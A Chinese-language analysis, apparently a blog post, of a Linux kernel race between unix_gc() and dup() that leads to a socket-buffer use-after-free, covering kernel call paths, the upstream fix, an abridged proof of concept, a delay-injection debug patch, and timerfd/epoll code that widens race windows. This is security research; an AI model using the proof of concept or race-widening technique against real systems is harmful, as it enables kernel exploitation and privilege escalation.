概述
原文: Racing against the clock — hitting a tiny kernel race window
- Part.1: 漏洞原理简述
- Part.2: 对比较容易产生疑惑的地方增加了细节说明
- Part.3: 针对文中提高 race 的技巧做了分析
Part.1
The bug & race
The kernel tries to figure out whether it can account for all references to some file by comparing the file’s refcount with the number of references from inflight SKBs (socket buffers). If they are equal, it assumes that the UNIX domain sockets subsystem effectively has exclusive access to the file because it owns all references.
The problem is that struct file can also be referenced from an RCU read-side critical section (which you can’t detect by looking at the refcount), and such an RCU reference can be upgraded into a refcounted reference using
get_file_rcu()
/get_file_rcu_many()
by__fget_files()
as long as the refcount is non-zero.
-
unix_gc()
的预期逻辑是:total_refs
和inflight_refs
相同就可以认为此时file
是单独占有的,就可以把skb
和file
一起 free 掉 - 下面代码 (3) 在 (1) 和 (2)中间执行则 race 成功
- 如果 race 没有成功,
__fget_files
那里就会发现f_count
是 0 或者 file 是 NULL - 但是如果 race 成功的话,
file->f_count
在__fget_files()
中会被加 1 ,在unix_gc
后面的代码中就不会被释放file
的内存,而只是把f_count
减 1,这也意味着在close()
之后依然可以dup()
成功
dup() -> __fget_files()
file = files_lookup_fd_rcu(files, fd); // fdt->fd[fd] (1)
...
get_file_rcu_many(file, refs) // update: f_count+1 (2)
close() -> unix_gc()
list_for_each_entry_safe(u, next, &gc_inflight_list, link) {
total_refs = file_count(u->sk.sk_socket->file); // read f_count: 1 (3)
inflight_refs = atomic_long_read(&u->inflight); // inflight_refs: 1
...
if (total_refs == inflight_refs) { // compare
list_move_tail(&u->link, &gc_candidates);
...
unix_gc() 中 file 和 skb 没有同步释放可能造成的影响?
下面这个方式可以触发 skb UAF:
socketpair() // 获取 socket pair fds: 3, 4
sendmsg(4, 3) // 通过 fd 4 发送 fd 3
-> skb_queue_tail(&other->sk_receive_queue, skb); // other 是 fd 4 的 peer 也就是 fd 3, skb 保存了 fd 4 发送的内容也是 fd 3
close(3) | dup(3) // close 和 dup 存在 race,dup 如果 race 成功会返回 fd 3
recvmsg(3) // 通过 fd 3 接收 fd 4 发送的 skb
-> last = skb = skb_peek(&sk->sk_receive_queue); // 此时 skb 对应的内存已经被 free 了
skb uaf:
- allocated in:
sendmsg() -> unix_stream_sendmsg()
- freed in:
close() -> unix_gc()
- uafed in:
recvmsg() -> unix_stream_read_generic()
Part.2
SCM_RIGHTS unix socket
SCM_RIGHTS
is a socket control message used for passing file descriptors between processes over a UNIX domain socket.It allows a process to send an open file descriptor to another process, which can then use the file descriptor to read or write to the same file or device.
- example
- sender.c
```c
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/un.h>
int main(int argc, char *argv[]) {
if (argc < 2) {
printf("Usage: %s <file_path>\n", argv[0]);
return 1;
}
char *file_path = argv[1];
int sock = socket(AF_UNIX, SOCK_STREAM, 0);
if (sock == -1) {
perror("socket");
return 1;
}
struct sockaddr_un addr;
memset(&addr, 0, sizeof(addr));
addr.sun_family = AF_UNIX;
strncpy(addr.sun_path, "/tmp/file_transfer.sock", sizeof(addr.sun_path) - 1);
if (connect(sock, (struct sockaddr *) &addr, sizeof(addr)) == -1) {
perror("connect");
return 1;
}
int fd = open(file_path, O_RDONLY);
if (fd == -1) {
perror("open");
return 1;
}
struct msghdr msg = {0};
char buf[CMSG_SPACE(sizeof(fd))];
memset(buf, 0, sizeof(buf));
struct iovec io = { .iov_base = "hello", .iov_len = 5 };
msg.msg_iov = &io;
msg.msg_iovlen = 1;
msg.msg_control = buf;
msg.msg_controllen = sizeof(buf);
struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
cmsg->cmsg_level = SOL_SOCKET;
cmsg->cmsg_type = SCM_RIGHTS;
cmsg->cmsg_len = CMSG_LEN(sizeof(fd));
*((int *) CMSG_DATA(cmsg)) = fd;
if (sendmsg(sock, &msg, 0) == -1) {
perror("sendmsg");
return 1;
}
close(fd);
close(sock);
return 0;
}
```
- recver.c
```c
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/un.h>
int main(int argc, char *argv[]) {
int sock = socket(AF_UNIX, SOCK_STREAM, 0);
if (sock == -1) {
perror("socket");
return 1;
}
struct sockaddr_un addr;
memset(&addr, 0, sizeof(addr));
addr.sun_family = AF_UNIX;
strncpy(addr.sun_path, "/tmp/file_transfer.sock", sizeof(addr.sun_path) - 1);
if (bind(sock, (struct sockaddr *) &addr, sizeof(addr)) == -1) {
perror("bind");
return 1;
}
if (listen(sock, 1) == -1) {
perror("listen");
return 1;
}
int client_sock = accept(sock, NULL, NULL);
if (client_sock == -1) {
perror("accept");
return 1;
}
char buf[256];
struct iovec io = { .iov_base = buf, .iov_len = sizeof(buf) };
struct msghdr msg = {
.msg_iov = &io,
.msg_iovlen = 1
};
char control[CMSG_SPACE(sizeof(int))];
msg.msg_control = control;
msg.msg_controllen = sizeof(control);
if (recvmsg(client_sock, &msg, 0) == -1) {
perror("recvmsg");
return 1;
}
struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
if (cmsg == NULL || cmsg->cmsg_type != SCM_RIGHTS) {
printf("Invalid message\n");
return 1;
}
int fd = *((int *) CMSG_DATA(cmsg));
if (fd == -1) {
perror("No file descriptor received");
return 1;
}
// Do something with the received file descriptor
char buf2[256];
ssize_t bytes_read;
while ((bytes_read = read(fd, buf2, sizeof(buf2))) > 0) {
printf("%s", buf2);
}
close(fd);
close(client_sock);
close(sock);
return 0;
}
```
Unix socket sendmsg()
and recvmsg()
- 用于发送和接收
SCM_RIGHTS
unix socket 数据的主要处理函数是:unix_stream_sendmsg
和unix_stream_read_generic
- 特殊的地方在于:
-
sendmsg
的时候会创建skb
并放在全局列表gc_inflight_list
和接收端的sk_receive_queue
上 - 发送的
fd
对应的file
会绑定到skb
上(f_count
也会加 1) -
recvmsg
的时候从sk_receive_queue
取skb
-
unix_gc
则从gc_inflight_list
取skb
-
// net/socket.c
sendmsg() -> __sys_sendmsg() -> sock_sendmsg()-> sock_sendmsg_nosec()
-> // sock->ops->sendmsg
unix_stream_sendmsg() // struct unix_stream_ops
**__scm_send()**
scm_fp_copy()
fget_raw(fd)
...
__fget_files() // 每个被传递的 fd 引用加 1
other = unix_peer(sk);
skb = sock_alloc_send_pskb()
**unix_scm_to_skb()**
unix_attach_fds() // fd 与 skb 绑定
unix_inflight()
list_add_tail(&u->link, &**gc_inflight_list**); // unix_gc 处理的队列
**skb->destructor = unix_destruct_scm;** // 注册 skb destruct
**** skb_queue_tail(&other->**sk_receive_queue**, skb); // skb 直接放到 peer 的 sk_receive_queue 队列上
recvmsg() -> __sys_recvmsg() -> ...
-> // sock->ops->recvmsg
unix_stream_recvmsg()
unix_stream_read_generic()
last = skb = skb_peek(&sk->sk_receive_queue);// 取 skb
scm_recv() // 处理 fd
scm_detach_fds()
receive_fd_user() // 接收 fd
..
fd_install(new_fd, get_file(file));
__scm_destroy() // 释放 skb 绑定的 fd 引用
fput()
fput_many()
**struct sk_buff *skb
, struct unix_sock *u
, struct socket *sock
, struct sock *sk
和 struct file *file
之间的关系?**
struct socket *sock = &container_of(file->f_inode,
struct socket_alloc, vfs_inode)->socket
struct sock *sk = sock->sk
struct unix_sock *u = (struct unix_sock *)sk
struct file *file = u->sk.sk_socket->file
struct file *file = (*(struct unix_skb_parms *)&((skb)->cb)).fp->fp[i]
unix_gc()
做了什么?
- 遍历
gc_inflight_list
获取unix_sock
对象- 把满足条件的
unix_sock
添加到gc_candidates
- 条件:
unix_sock
的文件引用和skb
引用值相同
- 把满足条件的
- 遍历
gc_candidates
- 把满足条件的
skb
添加到hitlist
- 把满足条件的
- 释放
hitlist
上的skb
内存和与之绑定的struc file
unix_gc()
struct sk_buff_head hitlist;
...
list_for_each_entry_safe(u, next, &gc_inflight_list, link) {
total_refs = file_count(u->sk.sk_socket->file);
inflight_refs = atomic_long_read(&u->inflight);
if (total_refs == inflight_refs) {
list_move_tail(&u->link, &gc_candidates);
}
...
skb_queue_head_init(&hitlist);
list_for_each_entry(u, &gc_candidates, link)
scan_children(&u->sk, inc_inflight, &hitlist);
scan_inflight(&u->sk, func, hitlist);
__skb_queue_tail(hitlist, skb);
...
__skb_queue_purge(&hitlist);
kfree_skb(skb);
unix_gc() 中 file 和 skb 在哪里 free ?
unix_gc()
...
skb_queue_head_init(&hitlist);
list_for_each_entry(u, &gc_candidates, link) // 从gc_candidates取skb到hitlist
scan_children(&u->sk, inc_inflight, NULL);
scan_inflight(&u->sk, func, hitlist);
__skb_queue_tail(hitlist, skb);
...
__skb_queue_purge(&hitlist); // (4)
kfree_skb(skb);
...
**skb->destructor() // 在 sendmsg 设置
unix_destruct_scm()**
scm_destroy()
__scm_destroy()
**fput() // 如果 f_count 是 1 则减到 0 然后释放 file**
kfree_skbmem()
**kmem_cache_free(.., skb) // 释放 skb**
// unix_destruct_scm 在 sendmsg 设置
sendmsg()
__sys_sendmsg()
sock_sendmsg()
sock_sendmsg_nosec()
unix_stream_sendmsg() // struct unix_stream_ops
skb = sock_alloc_send_pskb()
unix_scm_to_skb()
**skb->destructor = unix_destruct_scm;**
unix_gc()
何时被调用?
-
close()
可以间接触发- 具体入口的
syscall_exit_to_user_mode() - __fput()
- 具体入口的
-
sendmsg()
也可以触发但只在队列满的时候sendmsg() - wait_for_unix_gc()
// close() 一个 f_count 为 1 的文件时触发
close()
close_fd()
filp_close()
fput()
fput_many(file, 1);
atomic_long_sub_and_test(refs, &file->f_count)
init_task_work(&file->f_u.fu_rcuhead, ____fput)
task_work_add(task, &file->f_u.fu_rcuhead, TWA_RESUME)
entry_SYSCALL_64
do_syscall_64
syscall_exit_to_user_mode
...
tracehook_notify_resume
task_work_run()
__fput()
sock_close() // (struct file *) ->f_op->release()
__sock_release()
unix_release() // (struct socket *) ->ops->release()
unix_release_sock()
**unix_gc()**
// 只有 inflight sockets 超过 UNIX_INFLIGHT_TRIGGER_GC(16000) 才会调用
sendmsg()
...
unix_stream_sendmsg()/unix_dgram_sendmsg()
wait_for_unix_gc()
if (unix_tot_inflight > UNIX_INFLIGHT_TRIGGER_GC && !gc_in_progress)
**unix_gc();**
dup() 的作用和实现原理?
- 根据 fd 从 fd table 中获取
struct file *file
- 如果
f_count
不为 0 则file->f_count += 1
- fd table 中新建一个条目指向 file
SYSCALL_DEFINE1(dup, unsigned int, fildes)
fget_raw()
__fget(fd, FMODE_PATH, 1)
__fget_files(current->files, fd, mask, refs)
file = files_lookup_fd_rcu(files, fd);// 根据 fd 从 fd table 中获取 struct file *file
get_file_rcu_many(file, refs)
atomic_long_add_unless(&(x)->f_count, (cnt), 0) // if not 0, file->f_count += 1
get_unused_fd_flags()
fd_install() // fd table 中新建一个条目指向 file
close()
的作用和实现原理?
- 使 fd 重新可用
- 把 fd table 中 fd 对应的条目删除(设置为 NULL)
- fd table 中原来指向的
struct file
的f_count
减 1,如果减到 0 则释放 struct file 的内存 -
close
不一定会立马释放struct file
, 但是用户态不能再访问该fd
,比如dup(fd)
,read(fd)
..
close()
close_fd()
pick_file()
fdt = files_fdtable(files);
file = fdt->fd[fd];
**rcu_assign_pointer(fdt->fd[fd], NULL); // fd table 中 fd 对应的条目删除
__put_unused_fd(files, fd); // 使 fd 重新可用**
filp_close()
**fput()**
fput_many(file, 1); // fd table 中原来指向的 struct file 的 f_count 减 1
atomic_long_sub_and_test(refs, &file->f_count)
**init_task_work(&file->f_u.fu_rcuhead, ____fput)**
task_work_add(task, &file->f_u.fu_rcuhead, TWA_RESUME)
____fput()
__fput()
file_free()
file_free_rcu()
**kmem_cache_free(filp_cachep, f) // 如果减到 0 则释放 struct file 的内存**
增加 kernel delay patch 的 poc 如何 work ?
- line-27 将 pair[0] f_count +1 并添加到
gc_inflight_list
和sk_receive_queue
- line-29 和 line-43 用于触发
unix_gc()
调用, 因为需要一个f_count
为 1 的fd
被close()
- line-36 用于等待
resurrect_fn()->dup()->__fget_files()
调用进入 race window 拿到struct file
, 因为 line-37 会把pair[0]
从 fd table 中移除。 usleep 的时间 100000 us 要小于 kernel patch 的 500ms - line-43 会在
__fget_files()
等待的期间执行unix_gc()
, 在执行到准备释放 skb 的代码时,会等待 line-11 的 dup() 完成。 -
dup()
完成后执行到 line-16 的recvmsg()
,内核会等待 line-43 触发的unix_gc()
完成 skb 的释放 -
unix_gc()
完成后,recvmsg()
继续执行拿到被释放的 skb,UAF
省略版 POC:
1 void send_fd(int sock, int fd) {
2 ...
3 sendmsg(sock, &msg, 0);
4 }
5
6 int resurrect_fd = -1;
7 int resurrected_fd = -1;
8
9 void *resurrect_fn(void *arg) {
10 prctl(PR_SET_NAME, "SLOW-ME"); // tell kernel to inject mdelay()
11 resurrected_fd = dup(resurrect_fd);
12 prctl(PR_SET_NAME, "resurrect");
13
14 prctl(PR_SET_NAME, "SLOW-RECV");
15 ...
16 int recv_bytes = recvmsg(resurrected_fd, &msg, MSG_DONTWAIT);
17 prctl(PR_SET_NAME, "resurrect");
18
19 return NULL;
20 }
21
22 int main(void) {
23 /* create socketpair */
24 int pair[2];
25 socketpair(AF_UNIX, SOCK_STREAM, 0, pair);
26
27 send_fd(pair[1], pair[0]);
28
29 int trigger_sock = socket(AF_UNIX, SOCK_DGRAM, 0);
30
31 resurrect_fd = pair[0];
32
33 pthread_t resurrect_thread;
34 pthread_create(&resurrect_thread, NULL, resurrect_fn, NULL);
35
36 usleep(100000); /* wait for fget_raw() to see pointer */
37 close(pair[0]);
38
39 /*
40 * trigger unix GC; has to read file_count() before file inc
41 * but do hitlist kill after file inc
42 */
43 close(trigger_sock);
44
45 /* make sure dup() has really finished */
46 pthread_join(resurrect_thread, NULL);
47
48 }
kernel patch 增加三个 mdelay
@@ -850,6 +852,13 @@ static struct file *__fget_files(struct files_struct *files, unsigned int fd,
loop:
file = files_lookup_fd_rcu(files, fd);
if (file) {
+ if (strcmp(current->comm, "SLOW-ME") == 0) {
+ pr_warn("slowing lookup of fd %u to file 0x%lx with %ld refs\n",
+ fd, (unsigned long)file, file_count(file));
**+ mdelay(500);**
+ pr_warn("slowed lookup of fd %u to file 0x%lx with %ld refs\n",
+ fd, (unsigned long)file, file_count(file));
+ }
...
@@ -2631,6 +2633,12 @@ static int unix_stream_read_generic(struct unix_stream_read_state *state,
last = skb = skb_peek(&sk->sk_receive_queue);
last_len = last ? last->len : 0;
+ if (strcmp(current->comm, "SLOW-RECV") == 0) {
+ pr_warn("recvmsg: delaying stream receive\n");
+ mdelay(500);
+ pr_warn("recvmsg: delayed stream receive\n");
+ }
+
...
@@ -210,8 +212,11 @@ void unix_gc(void)
...
skb_queue_head_init(&hitlist);
+ if (strcmp(current->comm, "resurrect") == 0) {
+ pr_warn("unix: delaying hitlist setup\n");
+ mdelay(500);
+ pr_warn("unix: hitlist setup delay done\n");
+ }
list_for_each_entry(u, &gc_candidates, link)
scan_children(&u->sk, inc_inflight, &hitlist);
fixed patch 如何 work ?
- 补丁效果:在 race window 期间,如果 fd 对应的
struct file
已经从 fd table 移除,则回退对f_count
的操作,如果发现回退后变为 0 则直接释放struct file
diff --git a/fs/file.c b/fs/file.c
index 8627dacfc4246..ad4a8bf3cf109 100644
--- a/fs/file.c
+++ b/fs/file.c
@@ -858,6 +858,10 @@ loop:
file = NULL;
else if (!get_file_rcu_many(file, refs))
goto loop;
+ else if (files_lookup_fd_raw(files, fd) != file) {
+ fput_many(file, refs);
+ goto loop;
+ }
}
rcu_read_unlock();
Part.3
如何利用 hrtimer 扩大 race 成功率?
-
timerfd_create
+timerfd_settime
可以在指定时间(纳秒)后触发 timer interrupt - timer interrupt handler 会调用
__wake_up_common
遍历 wait queue 并执行回调函数。这意味着 wait queue 越长,处在 interrupt context 的时间越长 - 利用这一点可以让进程在 race window 中被中断,然后在另一个 CPU 上运行需要与之 race 的进程
wait queue item 在哪里添加和读取 ?
- 每一个
EPOLL_CTL_ADD
会在 timer_fd 的 wait queue 上添加一个执行ep_poll_callback
的 entry - 在
timerfd_triggered
中 从 timer_fd 的 wait queue 中取出 entry
// epoll_ctl(epoll_fds[i], EPOLL_CTL_ADD, timer_fds[j]
do_epoll_ctl() // 在 ep_ptable_queue_proc 中添加 wait_queue_enty
ep_insert(struct eventpoll *ep, ..
struct ep_pqueue epq;
init_poll_funcptr(&epq.pt, **ep_ptable_queue_proc**); // epq.pt._qproc = **ep_ptable_queue_proc**
ep_item_poll(epi, &epq.pt, 1);
vfs_poll
timerfd_poll // struct file_operations timerfd_fops.poll
struct timerfd_ctx *ctx = file->private_data;
poll_wait(file, &ctx->wqh, wait); // &ctx->wqh: whead, wait: &epq.pt, (include/linux/poll.h)
**ep_ptable_queue_proc**(struct file *file, wait_queue_head_t *whead, poll_table *pt)
struct epitem *epi = ep_item_from_epqueue(pt);
struct eppoll_entry *pwq;
...
pwq = kmem_cache_alloc(pwq_cache, GFP_KERNEL);
...
**init_waitqueue_func_entry(&pwq->wait, ep_poll_callback);**
...
**add_wait_queue(whead, &pwq->wait); // whead:** &ctx->wqh
...
struct ep_pqueue {
poll_table pt;
struct epitem *epi;
}
struct poll_table_struct {
poll_queue_proc _qproc; // void (*)(struct file *, wait_queue_head_t *, struct poll_table_struct *)
__poll_t _key;
}
local_apic_timer_interrupt()
**hrtimer_interrupt()**
...
timerfd_tmrproc()
**timerfd_triggered()**
**spin_lock_irqsave(&ctx->wqh.lock, flags);** // 关中断
**** ctx->expired = 1;
ctx->ticks++;
wake_up_locked_poll(**&ctx->wqh**, EPOLLIN);
**__wake_up_common() // 遍历 wait queue, 执行 callback**
wait_queue_entry_t *curr, *next;
**list_for_each_entry_safe_from(curr, next, &wq_head->head, entry)**
ret = curr->func(curr, mode, wake_flags, key); // ep_poll_callback
spin_unlock_irqrestore(&ctx->wqh.lock, flags);
**timerfd_tmrproc
在 timerfd_setup
中设置**
static int timerfd_setup(struct timerfd_ctx *ctx, int flags,
const struct itimerspec64 *ktmr)
..
hrtimer_init(&ctx->t.tmr, clockid, htmode);
hrtimer_set_expires(&ctx->t.tmr, texp);
ctx->t.tmr.function = timerfd_tmrproc;
**struct timerfd_ctx
, struct file
, struct hrtimer
之间的关系**
struct timerfd_ctx *ctx = file->private_data;
struct hrtimer *htmr = &ctx->t.tmr;
struct timerfd_ctx *ctx = container_of(htmr, struct timerfd_ctx, t.tmr);
测试代码:
向 wait queue 中添加 500 * 500 个 entry
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/epoll.h>
#include <sys/timerfd.h>
#include <sched.h>
#include <err.h>
#define SYSCHK(x) ({ \
typeof(x) __res = (x); \
if (__res == (typeof(x))-1) \
err(1, "SYSCHK(" #x ")"); \
__res; \
})
#define NUM_EPOLL_INSTANCES 500
#define NUM_DUP_FDS 500
#define NUM_TIMER_WAITERS (NUM_EPOLL_INSTANCES * NUM_DUP_FDS)
#define NSEC_PER_SEC 1000000000UL // 1s = 1000000000ns
void pin_task_to(int pid, int cpu) {
cpu_set_t cset;
CPU_ZERO(&cset);
CPU_SET(cpu, &cset);
SYSCHK(sched_setaffinity(pid, sizeof(cpu_set_t), &cset));
}
void pin_to(int cpu) { pin_task_to(0, cpu); }
struct timespec get_mono_time(void) {
struct timespec ts;
clock_gettime(CLOCK_MONOTONIC, &ts);
return ts;
}
void ts_add(struct timespec *ts, unsigned long nsecs) {
ts->tv_nsec += nsecs;
if (ts->tv_nsec >= NSEC_PER_SEC) {
ts->tv_sec++;
ts->tv_nsec -= NSEC_PER_SEC;
}
}
int main() {
pin_to(0);
int timerfd = timerfd_create(CLOCK_MONOTONIC, 0);
if (timerfd < 0) {
perror("timerfd_create");
return 1;
}
// 创建 epoll instances
int epoll_fds[NUM_EPOLL_INSTANCES];
for (int i = 0; i < NUM_EPOLL_INSTANCES; i++) {
epoll_fds[i] = epoll_create1(0);
if (epoll_fds[i] < 0) {
perror("epoll_create1");
return 1;
}
}
// dup timer fd
int timer_fds[NUM_DUP_FDS];
for (int i = 0; i < NUM_DUP_FDS; i++) {
timer_fds[i] = dup(timerfd);
if (timer_fds[i] < 0) {
perror("dup");
return 1;
}
}
// epoll_ctl EPOLL_CTL_ADD 添加到 wait queue
struct epoll_event ev = { 0 };
ev.events = EPOLLIN;
for (int i = 0; i < NUM_EPOLL_INSTANCES; i++) {
for (int j = 0; j < NUM_DUP_FDS; j++) {
ev.data.fd = timer_fds[j];
if (epoll_ctl(epoll_fds[i], EPOLL_CTL_ADD, timer_fds[j], &ev) < 0) {
perror("epoll_ctl");
return 1;
}
}
}
struct timespec base_time = get_mono_time();
struct itimerspec timer_value = { .it_value = base_time };
ts_add(&timer_value.it_value, 1000 * 1000 * 1000); // timer at +1s
if (timerfd_settime(timerfd, TFD_TIMER_ABSTIME, &timer_value, NULL) < 0) {
perror("timerfd_settime");
return 1;
}
for (int i = 0; i < NUM_EPOLL_INSTANCES; i++) {
int nfds = epoll_wait(epoll_fds[i], &ev, 1, -1);
if (nfds < 0) {
perror("epoll_wait");
return 1;
}
}
unsigned long value;
read(timerfd, &value, sizeof(value)) == sizeof(value);
printf("value: %ld\n", value);
for (int i = 0; i < NUM_EPOLL_INSTANCES; i++) {
close(epoll_fds[i]);
}
for (int i = 0; i < NUM_DUP_FDS; i++) {
close(timer_fds[i]);
}
close(timerfd);
return 0;
}
如何观测延迟效果?
在 GDB 中可以查看队列中的 entry,数量与设置的一致
b timerfd_triggered
set $head = &ctx.wqh.head
set $node = $head
while $node.next != $head
p $node.next
set $node = $node.next
end
p *$head
加一点 patch 用 rdtsc
可以粗略测量一下延迟效果
**0xffffffff81b8b67e <+49>: rdtsc**
0xffffffff81b8b680 <+51>: shl rdx,0x20
0xffffffff81b8b684 <+55>: or rax,rdx
0xffffffff81b8b687 <+58>: lea r12,[rbx+0x88]
0xffffffff81b8b68e <+65>: mov r14,rax
0xffffffff81b8b691 <+68>: mov rdi,r12
0xffffffff81b8b694 <+71>: call 0xffffffff81bde9d0 <_raw_spin_lock_irqsave>
0xffffffff81b8b699 <+76>: inc QWORD PTR [rbx+0xa0]
0xffffffff81b8b6a0 <+83>: mov edx,0x1
0xffffffff81b8b6a5 <+88>: mov rdi,r12
0xffffffff81b8b6a8 <+91>: mov WORD PTR [rbx+0xac],0x1
0xffffffff81b8b6b1 <+100>: mov r13,rax
0xffffffff81b8b6b4 <+103>: mov esi,0x3
0xffffffff81b8b6b9 <+108>: call 0xffffffff810ad650 <__wake_up_locked_key>
0xffffffff81b8b6be <+113>: mov rsi,r13
0xffffffff81b8b6c1 <+116>: mov rdi,r12
0xffffffff81b8b6c4 <+119>: call 0xffffffff81bde5b0 <_raw_spin_unlock_irqrestore>
**0xffffffff81b8b6c9 <+124>: rdtsc**
diff --git a/fs/timerfd.c b/fs/timerfd.c
index e9c96a0c79f1..b919b24b4d48 100644
--- a/fs/timerfd.c
+++ b/fs/timerfd.c
@@ -64,11 +64,20 @@ static void timerfd_triggered(struct timerfd_ctx *ctx)
{
unsigned long flags;
+ u64 start_time, end_time;
+
+ pr_warn("[%s] %s enter\n", current->comm, __func__);
+
+ asm volatile ("rdtsc; shlq $32, %%rdx; orq %%rdx, %0"
+ : "=a"(start_time) :: "%rdx");
spin_lock_irqsave(&ctx->wqh.lock, flags);
ctx->expired = 1;
ctx->ticks++;
wake_up_locked_poll(&ctx->wqh, EPOLLIN);
spin_unlock_irqrestore(&ctx->wqh.lock, flags);
+ asm volatile ("rdtsc; shlq $32, %%rdx; orq %%rdx, %0"
+ : "=a"(end_time) :: "%rdx");
+ pr_warn("[%s] %s exit, %lld\n", current->comm, __func__, end_time - start_time);
}
系统正常运行的时候 tick 数大概在 3000 ~ 30000, 创建 500 * 500 个 entry 可以使cpu 运行时间增大 3~4 个数量级(测试虚拟机的CPU是单核 2000 MHz)
[ 1134.053250] [swapper/0] timerfd_triggered exit, 2976
[ 1134.053250] [swapper/0] timerfd_triggered enter
[ 1134.053250] [swapper/0] timerfd_triggered exit, 3970
[ 1134.552271] [swapper/0] timerfd_triggered enter
[ 1134.552906] [swapper/0] timerfd_triggered exit, 11616
[ 1175.552958] [swapper/0] timerfd_triggered enter
[ 1175.553871] [swapper/0] timerfd_triggered exit, 32663
[ 1176.052796] [swapper/0] timerfd_triggered enter
[ 1176.053719] [swapper/0] timerfd_triggered exit, 29340
[ 1184.738834] [swapper/0] timerfd_triggered enter
**[ 1184.739757] [swapper/0] timerfd_triggered exit, 27116541 // 500 * 500
...**
[ 1588.076916] [swapper/0] timerfd_triggered enter
**[ 1588.077841] [swapper/0] timerfd_triggered exit, 28924883 // 500 * 500
...**
[ 1596.735608] [swapper/0] timerfd_triggered enter
**[ 1596.736503] [swapper/0] timerfd_triggered exit, 28029898 // 500 * 500**
..
[ 1222.384483] [swapper/0] timerfd_triggered enter
**[ 1222.385381] [swapper/0] timerfd_triggered exit, 8511668 // 100 * 500**
...
[ 1265.026284] [swapper/0] timerfd_triggered enter
**[ 1265.027208] [swapper/0] timerfd_triggered exit, 1202548 // 10 * 500**
一种观测代码被中断位置的方法
原文的附录:
I tried firing an interval timer at 100Hz (using timer_create()), with a signal handler that logs the PC register
代码实现:
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <ucontext.h>
#include <sys/time.h>
#include <sys/user.h>
#include <time.h>
#include <sched.h>
#include <err.h>
#define SYSCHK(x) ({ \
typeof(x) __res = (x); \
if (__res == (typeof(x))-1) \
err(1, "SYSCHK(" #x ")"); \
__res; \
})
void pin_task_to(int pid, int cpu) {
cpu_set_t cset;
CPU_ZERO(&cset);
CPU_SET(cpu, &cset);
SYSCHK(sched_setaffinity(pid, sizeof(cpu_set_t), &cset));
}
void pin_to(int cpu) { pin_task_to(0, cpu); }
void timer_handler(int signum, siginfo_t *info, void *context) {
ucontext_t *ucontext = (ucontext_t *) context;
void *pc = (void *) ucontext->uc_mcontext.gregs[REG_RIP];
long rax = ucontext->uc_mcontext.gregs[REG_RAX];
printf("Timer fired, PC = %p, rax: %ld\n", pc, rax);
}
int main() {
pin_to(0);
// Set up the signal handler for SIGALRM
struct sigaction sa;
memset(&sa, 0, sizeof(sa));
sa.sa_flags = SA_SIGINFO;
sa.sa_sigaction = timer_handler;
sigaction(SIGALRM, &sa, NULL);
// Start the timer
struct itimerspec its;
its.it_interval.tv_sec = 0;
its.it_interval.tv_nsec = 10000000; // 100Hz
its.it_value = its.it_interval;
timer_t timerid;
timer_create(CLOCK_MONOTONIC, NULL, &timerid);
timer_settime(timerid, 0, &its, NULL);
// Run a loop to generate some activity
volatile int i;
while (1) {
__asm__ volatile (
"mov $1, %%rax\n\t" // Move 1 to rax
"mov $2, %%rax\n\t" // Move 2 to rax
"mov $3, %%rax\n\t" // Move 3 to rax
"mov $4, %%rax\n\t" // Move 4 to rax
"mov $5, %%rax\n\t" // Move 5 to rax
"mov $6, %%rax\n\t" // Move 6 to rax
"mov $7, %%rax\n\t" // Move 7 to rax
"mov $8, %%rax\n\t" // Move 8 to rax
"mov $9, %%rax\n\t" // Move 9 to rax
"mov $10, %%rax\n\t" // Move 10 to rax
: // No output operand
: // No input operand
: "%rax" // Clobbered register
);
//i = -1; /* 内存写操作 */
}
return 0;
}
发表评论
您还未登录,请先登录。
登录